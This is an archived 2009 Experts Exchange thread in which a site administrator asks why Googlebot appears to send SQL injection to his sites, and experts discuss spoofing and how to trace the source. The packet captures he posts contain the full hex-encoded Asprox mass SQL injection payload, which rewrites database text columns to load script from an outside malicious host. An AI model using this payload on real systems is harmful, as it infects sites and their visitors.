Expiring Today—Celebrate National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

Google used as a hacking tool - inadvertanty attacking my site

Posted on 2009-05-19
8
Medium Priority
?
447 Views
Last Modified: 2013-11-29
Google is somehow being used or manipulated to attack our website.  We have an IPS that records all attack traffic.  At least 500 times a day, googlebot attempts to hit a few sites in our facility with either sql injection such as ASPROX.  Because our IPS blocks the traffic, googlebot is never able to index the pages.  The site itself is not compromised in anyway and we cannot seem to determine why google is trying to do this.  Because googlebots traffic is being blocked, it is continuing to hit the site relentlessly.

Some packet captures are below


Frame 1 (1484 bytes on wire, 1484 bytes captured)
    Arrival Time: May 19, 2009 04:16:02.248079000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 1484 bytes
    Capture Length: 1484 bytes
    Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
    Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 1470
    Identification: 0xeb57 (60247)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 56
    Protocol: TCP (0x06)
    Header checksum: 0x052a [correct]
        Good: True
        Bad : False
    Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)
    Destination: www.coolabah.com (69.63.131.110)
Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
    Source port: 41347 (41347)
    Destination port: http (80)
    Sequence number: 0    (relative sequence number)
    Next sequence number: 1418    (relative sequence number)
    Acknowledgement number: 0    (relative ack number)
    Header length: 32 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 90
    Checksum: 0x9fda [correct]
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 121714743, tsecr 0
    TCP segment data (1418 bytes)
 
0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.
0010  05 be eb 57 40 00 38 06 05 2a 42 f9 41 12 45 3f   ...W@.8..*B.A.E?
0020  83 6e a1 83 00 50 ce cb d3 62 d5 94 b0 51 80 10   .n...P...b...Q..
0030  00 5a 9f da 00 00 01 01 08 0a 07 41 38 37 00 00   .Z.........A87..
0040  00 00 47 45 54 20 2f 73 70 6f 72 74 2f 6d 61 67   ..GET /sport/mag
0050  70 69 65 73 2e 63 66 6d 3f 3b 44 45 43 4c 41 52   pies.cfm?;DECLAR
0060  45 25 32 30 40 53 25 32 30 43 48 41 52 28 34 30   E%20@S%20CHAR(40
0070  30 30 29 3b 53 45 54 25 32 30 40 53 3d 43 41 53   00);SET%20@S=CAS
0080  54 28 30 78 34 34 34 35 34 33 34 43 34 31 35 32   T(0x4445434C4152
0090  34 35 32 30 34 30 35 34 32 30 37 36 36 31 37 32   4520405420766172
00a0  36 33 36 38 36 31 37 32 32 38 33 32 33 35 33 35   6368617228323535
00b0  32 39 32 43 34 30 34 33 32 30 37 36 36 31 37 32   292C404320766172
00c0  36 33 36 38 36 31 37 32 32 38 33 34 33 30 33 30   6368617228343030
00d0  33 30 32 39 32 30 34 34 34 35 34 33 34 43 34 31   3029204445434C41
00e0  35 32 34 35 32 30 35 34 36 31 36 32 36 43 36 35   5245205461626C65
00f0  35 46 34 33 37 35 37 32 37 33 36 46 37 32 32 30   5F437572736F7220
0100  34 33 35 35 35 32 35 33 34 46 35 32 32 30 34 36   435552534F522046
0110  34 46 35 32 32 30 37 33 36 35 36 43 36 35 36 33   4F522073656C6563
0120  37 34 32 30 36 31 32 45 36 45 36 31 36 44 36 35   7420612E6E616D65
0130  32 43 36 32 32 45 36 45 36 31 36 44 36 35 32 30   2C622E6E616D6520
0140  36 36 37 32 36 46 36 44 32 30 37 33 37 39 37 33   66726F6D20737973
0150  36 46 36 32 36 41 36 35 36 33 37 34 37 33 32 30   6F626A6563747320
0160  36 31 32 43 37 33 37 39 37 33 36 33 36 46 36 43   612C737973636F6C
0170  37 35 36 44 36 45 37 33 32 30 36 32 32 30 37 37   756D6E7320622077
0180  36 38 36 35 37 32 36 35 32 30 36 31 32 45 36 39   6865726520612E69
0190  36 34 33 44 36 32 32 45 36 39 36 34 32 30 36 31   643D622E69642061
01a0  36 45 36 34 32 30 36 31 32 45 37 38 37 34 37 39   6E6420612E787479
01b0  37 30 36 35 33 44 32 37 37 35 32 37 32 30 36 31   70653D2775272061
01c0  36 45 36 34 32 30 32 38 36 32 32 45 37 38 37 34   6E642028622E7874
01d0  37 39 37 30 36 35 33 44 33 39 33 39 32 30 36 46   7970653D3939206F
01e0  37 32 32 30 36 32 32 45 37 38 37 34 37 39 37 30   7220622E78747970
01f0  36 35 33 44 33 33 33 35 32 30 36 46 37 32 32 30   653D3335206F7220
0200  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D
0210  33 32 33 33 33 31 32 30 36 46 37 32 32 30 36 32   323331206F722062
0220  32 45 37 38 37 34 37 39 37 30 36 35 33 44 33 31   2E78747970653D31
0230  33 36 33 37 32 39 32 30 34 46 35 30 34 35 34 45   363729204F50454E
0240  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43
0250  37 35 37 32 37 33 36 46 37 32 32 30 34 36 34 35   7572736F72204645
0260  35 34 34 33 34 38 32 30 34 45 34 35 35 38 35 34   544348204E455854
0270  32 30 34 36 35 32 34 46 34 44 32 30 32 30 35 34   2046524F4D202054
0280  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572
0290  37 33 36 46 37 32 32 30 34 39 34 45 35 34 34 46   736F7220494E544F
02a0  32 30 34 30 35 34 32 43 34 30 34 33 32 30 35 37   2040542C40432057
02b0  34 38 34 39 34 43 34 35 32 38 34 30 34 30 34 36   48494C4528404046
02c0  34 35 35 34 34 33 34 38 35 46 35 33 35 34 34 31   455443485F535441
02d0  35 34 35 35 35 33 33 44 33 30 32 39 32 30 34 32   5455533D30292042
02e0  34 35 34 37 34 39 34 45 32 30 36 35 37 38 36 35   4547494E20657865
02f0  36 33 32 38 32 37 37 35 37 30 36 34 36 31 37 34   6328277570646174
0300  36 35 32 30 35 42 32 37 32 42 34 30 35 34 32 42   65205B272B40542B
0310  32 37 35 44 32 30 37 33 36 35 37 34 32 30 35 42   275D20736574205B
0320  32 37 32 42 34 30 34 33 32 42 32 37 35 44 33 44   272B40432B275D3D
0330  32 37 32 37 32 32 33 45 33 43 32 46 37 34 36 39   2727223E3C2F7469
0340  37 34 36 43 36 35 33 45 33 43 37 33 36 33 37 32   746C653E3C736372
0350  36 39 37 30 37 34 32 30 37 33 37 32 36 33 33 44   697074207372633D
0360  32 32 36 38 37 34 37 34 37 30 33 41 32 46 32 46   22687474703A2F2F
0370  37 37 37 37 37 37 33 33 32 45 37 33 37 33 33 31   777777332E737331
0380  33 31 37 31 36 45 32 45 36 33 36 45 32 46 36 33   31716E2E636E2F63
0390  37 33 37 32 37 33 37 33 32 46 37 37 32 45 36 41   737273732F772E6A
03a0  37 33 32 32 33 45 33 43 32 46 37 33 36 33 37 32   73223E3C2F736372
03b0  36 39 37 30 37 34 33 45 33 43 32 31 32 44 32 44   6970743E3C212D2D
03c0  32 37 32 37 32 42 35 42 32 37 32 42 34 30 34 33   27272B5B272B4043
03d0  32 42 32 37 35 44 32 30 37 37 36 38 36 35 37 32   2B275D2077686572
03e0  36 35 32 30 32 37 32 42 34 30 34 33 32 42 32 37   6520272B40432B27
03f0  32 30 36 45 36 46 37 34 32 30 36 43 36 39 36 42   206E6F74206C696B
0400  36 35 32 30 32 37 32 37 32 35 32 32 33 45 33 43   6520272725223E3C
0410  32 46 37 34 36 39 37 34 36 43 36 35 33 45 33 43   2F7469746C653E3C
0420  37 33 36 33 37 32 36 39 37 30 37 34 32 30 37 33   7363726970742073
0430  37 32 36 33 33 44 32 32 36 38 37 34 37 34 37 30   72633D2268747470
0440  33 41 32 46 32 46 37 37 37 37 37 37 33 33 32 45   3A2F2F777777332E
0450  37 33 37 33 33 31 33 31 37 31 36 45 32 45 36 33   73733131716E2E63
0460  36 45 32 46 36 33 37 33 37 32 37 33 37 33 32 46   6E2F63737273732F
0470  37 37 32 45 36 41 37 33 32 32 33 45 33 43 32 46   772E6A73223E3C2F
0480  37 33 36 33 37 32 36 39 37 30 37 34 33 45 33 43   7363726970743E3C
0490  32 31 32 44 32 44 32 37 32 37 32 37 32 39 34 36   212D2D2727272946
04a0  34 35 35 34 34 33 34 38 32 30 34 45 34 35 35 38   45544348204E4558
04b0  35 34 32 30 34 36 35 32 34 46 34 44 32 30 32 30   542046524F4D2020
04c0  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
04d0  37 32 37 33 36 46 37 32 32 30 34 39 34 45 35 34   72736F7220494E54
04e0  34 46 32 30 34 30 35 34 32 43 34 30 34 33 32 30   4F2040542C404320
04f0  34 35 34 45 34 34 32 30 34 33 34 43 34 46 35 33   454E4420434C4F53
0500  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F
0510  34 33 37 35 37 32 37 33 36 46 37 32 32 30 34 34   437572736F722044
0520  34 35 34 31 34 43 34 43 34 46 34 33 34 31 35 34   45414C4C4F434154
0530  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F
0540  34 33 37 35 37 32 37 33 36 46 37 32 25 32 30 41   437572736F72%20A
0550  53 25 32 30 43 48 41 52 28 34 30 30 30 29 29 3b   S%20CHAR(4000));
0560  45 58 45 43 28 40 53 29 3b 20 48 54 54 50 2f 31   EXEC(@S); HTTP/1
0570  2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 63 6f   .1..Host: www.co
0580  6f 6c 61 62 61 68 2e 63 6f 6d 0d 0a 43 6f 6e 6e   olabah.com..Conn
0590  65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69   ection: Keep-ali
05a0  76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d   ve..Accept: */*.
05b0  0a 46 72 6f 6d 3a 20 67 6f 6f 67 6c 65 62 6f 74   .From: googlebot
05c0  28 61 74 29 67 6f 6f 67 6c 65 62 6f               (at)googlebo
 
-----------------------------------------------------------------------------------------------------
Frame 1 (1484 bytes on wire, 1484 bytes captured)
    Arrival Time: May 19, 2009 04:08:20.781412000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 1484 bytes
    Capture Length: 1484 bytes
    Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
    Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 1470
    Identification: 0xb69e (46750)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 57
    Protocol: TCP (0x06)
    Header checksum: 0x325c [correct]
        Good: True
        Bad : False
    Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)
    Destination: 69.63.131.111 (69.63.131.111)
Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
    Source port: 33193 (33193)
    Destination port: http (80)
    Sequence number: 0    (relative sequence number)
    Next sequence number: 1418    (relative sequence number)
    Acknowledgement number: 0    (relative ack number)
    Header length: 32 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 92
    Checksum: 0x6bf1 [correct]
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 3656893948, tsecr 0
    TCP segment data (1418 bytes)
 
0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.
0010  05 be b6 9e 40 00 39 06 32 5c 42 f9 47 98 45 3f   ....@.9.2\B.G.E?
0020  83 6f 81 a9 00 50 de ea 73 7b 98 49 41 46 80 10   .o...P..s{.IAF..
0030  00 5c 6b f1 00 00 01 01 08 0a d9 f7 c5 fc 00 00   .\k.............
0040  00 00 47 45 54 20 2f 73 74 6f 72 79 31 31 38 2e   ..GET /story118.
0050  63 66 6d 3f 27 3b 44 45 43 4c 41 52 45 25 32 30   cfm?';DECLARE%20
0060  40 53 25 32 30 43 48 41 52 28 34 30 30 30 29 3b   @S%20CHAR(4000);
0070  53 45 54 25 32 30 40 53 3d 43 41 53 54 28 30 78   SET%20@S=CAST(0x
0080  34 34 34 35 34 33 34 43 34 31 35 32 34 35 32 30   4445434C41524520
0090  34 30 35 34 32 30 37 36 36 31 37 32 36 33 36 38   4054207661726368
00a0  36 31 37 32 32 38 33 32 33 35 33 35 32 39 32 43   617228323535292C
00b0  34 30 34 33 32 30 37 36 36 31 37 32 36 33 36 38   4043207661726368
00c0  36 31 37 32 32 38 33 34 33 30 33 30 33 30 32 39   6172283430303029
00d0  32 30 34 34 34 35 34 33 34 43 34 31 35 32 34 35   204445434C415245
00e0  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43
00f0  37 35 37 32 37 33 36 46 37 32 32 30 34 33 35 35   7572736F72204355
0100  35 32 35 33 34 46 35 32 32 30 34 36 34 46 35 32   52534F5220464F52
0110  32 30 37 33 36 35 36 43 36 35 36 33 37 34 32 30   2073656C65637420
0120  36 31 32 45 36 45 36 31 36 44 36 35 32 43 36 32   612E6E616D652C62
0130  32 45 36 45 36 31 36 44 36 35 32 30 36 36 37 32   2E6E616D65206672
0140  36 46 36 44 32 30 37 33 37 39 37 33 36 46 36 32   6F6D207379736F62
0150  36 41 36 35 36 33 37 34 37 33 32 30 36 31 32 43   6A6563747320612C
0160  37 33 37 39 37 33 36 33 36 46 36 43 37 35 36 44   737973636F6C756D
0170  36 45 37 33 32 30 36 32 32 30 37 37 36 38 36 35   6E73206220776865
0180  37 32 36 35 32 30 36 31 32 45 36 39 36 34 33 44   726520612E69643D
0190  36 32 32 45 36 39 36 34 32 30 36 31 36 45 36 34   622E696420616E64
01a0  32 30 36 31 32 45 37 38 37 34 37 39 37 30 36 35   20612E7874797065
01b0  33 44 32 37 37 35 32 37 32 30 36 31 36 45 36 34   3D27752720616E64
01c0  32 30 32 38 36 32 32 45 37 38 37 34 37 39 37 30   2028622E78747970
01d0  36 35 33 44 33 39 33 39 32 30 36 46 37 32 32 30   653D3939206F7220
01e0  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D
01f0  33 33 33 35 32 30 36 46 37 32 32 30 36 32 32 45   3335206F7220622E
0200  37 38 37 34 37 39 37 30 36 35 33 44 33 32 33 33   78747970653D3233
0210  33 31 32 30 36 46 37 32 32 30 36 32 32 45 37 38   31206F7220622E78
0220  37 34 37 39 37 30 36 35 33 44 33 31 33 36 33 37   747970653D313637
0230  32 39 32 30 34 46 35 30 34 35 34 45 32 30 35 34   29204F50454E2054
0240  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572
0250  37 33 36 46 37 32 32 30 34 36 34 35 35 34 34 33   736F722046455443
0260  34 38 32 30 34 45 34 35 35 38 35 34 32 30 34 36   48204E4558542046
0270  35 32 34 46 34 44 32 30 32 30 35 34 36 31 36 32   524F4D2020546162
0280  36 43 36 35 35 46 34 33 37 35 37 32 37 33 36 46   6C655F437572736F
0290  37 32 32 30 34 39 34 45 35 34 34 46 32 30 34 30   7220494E544F2040
02a0  35 34 32 43 34 30 34 33 32 30 35 37 34 38 34 39   542C404320574849
02b0  34 43 34 35 32 38 34 30 34 30 34 36 34 35 35 34   4C45284040464554
02c0  34 33 34 38 35 46 35 33 35 34 34 31 35 34 35 35   43485F5354415455
02d0  35 33 33 44 33 30 32 39 32 30 34 32 34 35 34 37   533D302920424547
02e0  34 39 34 45 32 30 36 35 37 38 36 35 36 33 32 38   494E206578656328
02f0  32 37 37 35 37 30 36 34 36 31 37 34 36 35 32 30   2775706461746520
0300  35 42 32 37 32 42 34 30 35 34 32 42 32 37 35 44   5B272B40542B275D
0310  32 30 37 33 36 35 37 34 32 30 35 42 32 37 32 42   20736574205B272B
0320  34 30 34 33 32 42 32 37 35 44 33 44 32 37 32 37   40432B275D3D2727
0330  32 32 33 45 33 43 32 46 37 34 36 39 37 34 36 43   223E3C2F7469746C
0340  36 35 33 45 33 43 37 33 36 33 37 32 36 39 37 30   653E3C7363726970
0350  37 34 32 30 37 33 37 32 36 33 33 44 32 32 36 38   74207372633D2268
0360  37 34 37 34 37 30 33 41 32 46 32 46 37 37 37 37   7474703A2F2F7777
0370  37 37 33 33 32 45 37 33 37 33 33 31 33 31 37 31   77332E7373313171
0380  36 45 32 45 36 33 36 45 32 46 36 33 37 33 37 32   6E2E636E2F637372
0390  37 33 37 33 32 46 37 37 32 45 36 41 37 33 32 32   73732F772E6A7322
03a0  33 45 33 43 32 46 37 33 36 33 37 32 36 39 37 30   3E3C2F7363726970
03b0  37 34 33 45 33 43 32 31 32 44 32 44 32 37 32 37   743E3C212D2D2727
03c0  32 42 35 42 32 37 32 42 34 30 34 33 32 42 32 37   2B5B272B40432B27
03d0  35 44 32 30 37 37 36 38 36 35 37 32 36 35 32 30   5D20776865726520
03e0  32 37 32 42 34 30 34 33 32 42 32 37 32 30 36 45   272B40432B27206E
03f0  36 46 37 34 32 30 36 43 36 39 36 42 36 35 32 30   6F74206C696B6520
0400  32 37 32 37 32 35 32 32 33 45 33 43 32 46 37 34   272725223E3C2F74
0410  36 39 37 34 36 43 36 35 33 45 33 43 37 33 36 33   69746C653E3C7363
0420  37 32 36 39 37 30 37 34 32 30 37 33 37 32 36 33   7269707420737263
0430  33 44 32 32 36 38 37 34 37 34 37 30 33 41 32 46   3D22687474703A2F
0440  32 46 37 37 37 37 37 37 33 33 32 45 37 33 37 33   2F777777332E7373
0450  33 31 33 31 37 31 36 45 32 45 36 33 36 45 32 46   3131716E2E636E2F
0460  36 33 37 33 37 32 37 33 37 33 32 46 37 37 32 45   63737273732F772E
0470  36 41 37 33 32 32 33 45 33 43 32 46 37 33 36 33   6A73223E3C2F7363
0480  37 32 36 39 37 30 37 34 33 45 33 43 32 31 32 44   726970743E3C212D
0490  32 44 32 37 32 37 32 37 32 39 34 36 34 35 35 34   2D27272729464554
04a0  34 33 34 38 32 30 34 45 34 35 35 38 35 34 32 30   4348204E45585420
04b0  34 36 35 32 34 46 34 44 32 30 32 30 35 34 36 31   46524F4D20205461
04c0  36 32 36 43 36 35 35 46 34 33 37 35 37 32 37 33   626C655F43757273
04d0  36 46 37 32 32 30 34 39 34 45 35 34 34 46 32 30   6F7220494E544F20
04e0  34 30 35 34 32 43 34 30 34 33 32 30 34 35 34 45   40542C404320454E
04f0  34 34 32 30 34 33 34 43 34 46 35 33 34 35 32 30   4420434C4F534520
0500  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
0510  37 32 37 33 36 46 37 32 32 30 34 34 34 35 34 31   72736F7220444541
0520  34 43 34 43 34 46 34 33 34 31 35 34 34 35 32 30   4C4C4F4341544520
0530  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
0540  37 32 37 33 36 46 37 32 25 32 30 41 53 25 32 30   72736F72%20AS%20
0550  43 48 41 52 28 34 30 30 30 29 29 3b 45 58 45 43   CHAR(4000));EXEC
0560  28 40 53 29 3b 20 48 54 54 50 2f 31 2e 31 0d 0a   (@S); HTTP/1.1..
0570  48 6f 73 74 3a 20 77 77 77 2e 6c 65 74 74 65 72   Host: www.letter
0580  66 72 6f 6d 6e 65 77 79 6f 72 6b 2e 63 6f 6d 0d   fromnewyork.com.
0590  0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65   .Connection: Kee
05a0  70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a   p-alive..Accept:
05b0  20 2a 2f 2a 0d 0a 46 72 6f 6d 3a 20 67 6f 6f 67    */*..From: goog
05c0  6c 65 62 6f 74 28 61 74 29 67 6f 6f               lebot(at)goo

Open in new window

0
Comment
Question by:vladfriedman
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
  • 2
  • +1
8 Comments
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 24426785
Bring this to the attention of Chris Shiflett, here: http://shiflett.org/

I am sure he will be interested and may have seen something similar that can help you out.

Best regards, ~Ray
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24479910
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything, that was what tells me that it's not really google, they move on quite quickly and typically only follow links and look for robots.txt
Google-bot first tries to find a robots.txt file, it tries in each directory it makes it into, I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
0
 

Expert Comment

by:gdi67
ID: 24489578
I'm agree with richrumble. There are some tools to which use google to crawled in your website.
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 

Author Comment

by:vladfriedman
ID: 24489630
It is the real google bot, it is originating from google owned IPs.  If I setup a page sql injection commands pointing to a destination site, and then had google index my page, it would thn try all of the links on my site which included the sql injection commands.

I know this is google.  The problem is not that google is originating the attack.  The trick is identifying the source page that was originally indexed.
0
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 2000 total points
ID: 24489708
Try adding your site to the end of this URL
http://www.google.com/safebrowsing/diagnostic?site=
Like this:
http://www.google.com/safebrowsing/diagnostic?site=experts-exchange.com
Google keeps a strict log of when and where google-bot has been, and from my findings the URL above only needs about an hour to be updated, so if my site was crawled, 1hr later it's there. Subdomains however don't show up...
If you think it's not spoofed traffic, write to google they are helpful and might be able to better track down the issue and how they are leveraged to do this attack. I still think it's spoofed, unless your site is coolabah.com
http://www.google.com/safebrowsing/diagnostic?site=www.coolabah.com which is infested and has been for some time.
-rich
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 24493285
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data can be faked.  Have you contacted Chris yet?

Best, ~Ray
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24494773
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributing via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a reciever, not a sender)
-rich
0
 

Author Comment

by:vladfriedman
ID: 24497475
Hi Ray.  THe IP really can't can't be faked in our envionrment, and it is not being faked.
0

Featured Post

Does Your Cloud Backup Use Blockchain Technology?

Blockchain technology has already revolutionized finance thanks to Bitcoin. Now it's disrupting other areas, including the realm of data protection. Learn how blockchain is now being used to authenticate backup files and keep them safe from hackers.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In this article, WatchGuard's Director of Security Strategy and Research Teri Radichel, takes a look at insider threats, the risk they can pose to your organization, and the best ways to defend against them.
What we learned in Webroot's webinar on multi-vector protection.
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…

719 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question